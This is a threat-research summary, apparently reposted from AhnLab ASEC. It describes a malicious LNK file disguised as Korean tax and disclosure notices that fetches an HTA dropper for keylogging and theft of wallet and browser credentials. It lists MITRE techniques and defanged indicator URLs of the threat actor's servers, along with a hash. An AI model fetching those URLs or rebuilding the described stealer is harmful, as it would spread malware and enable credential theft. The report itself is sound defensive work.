Threat Research

Malicious LNK Disguised as Notices

Ahnlab
Malicious LNK Disguised as Notices

AhnLab’s ASEC has identified a malicious LNK file targeting Korean users that collects sensitive data, including information related to cryptocurrency wallets and browser credentials. Upon execution, the LNK file downloads and runs a harmful HTA file which contains additional malicious scripts that perform keylogging and information theft. Affected: Korean users, digital asset holders

Keypoints :

  • A malicious LNK file was discovered, targeting Korean users for data theft.
  • The file disguises itself as various documents, such as local tax bills and public disclosures.
  • Execution of the LNK file downloads a harmful HTA file from the threat actor’s server.
  • The HTA file contains a ZIP archive with multiple files, including PowerShell scripts.
  • 1.log collects sensitive information and executes commands, while 2.log performs keylogging.
  • The malware targets data from cryptocurrency wallets and browser profiles.
  • Several specific file types and names are used to gather stolen information.
  • The usage of a Korean portal site URL for distribution indicates targeted attacks against a specific demographic.

MITRE Techniques :

  • Collection (T1056): Keylogging performed by 2.log to capture user input and clipboard data.
  • Command and Control (T1071.001): The use of periodic communication with the attacker’s server to receive additional commands.
  • Credential Dumping (T1003.001): Collecting encrypted browser information and public certificates from browsers through functions in 1.log.
  • Data Encrypted (T1043): Utilizing the Data Protection API to decrypt sensitive browser data.
  • Exfiltration Over Command and Control Channel (T1041): Compressed stolen data is uploaded to the threat actor’s server via the UploadFile function in 1.log.

Indicator of Compromise :

  • [URL] hxxps://nid-naveroup.servepics[.]com/docs/revenue.zip
  • [URL] https[:]//cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/prevenue[.]hta
  • [URL] https[:]//cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/sfmw[.]hta
  • [URL] https[:]//cdn[.]glitch[.]global/2eefa6a0-44ff-4979-9a9c-689be652996d/wsoj[.]hta
  • [MD5] 1b90eff0b4f54da72b19195489c3af6c

Full Story: https://asec.ahnlab.com/en/87620/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint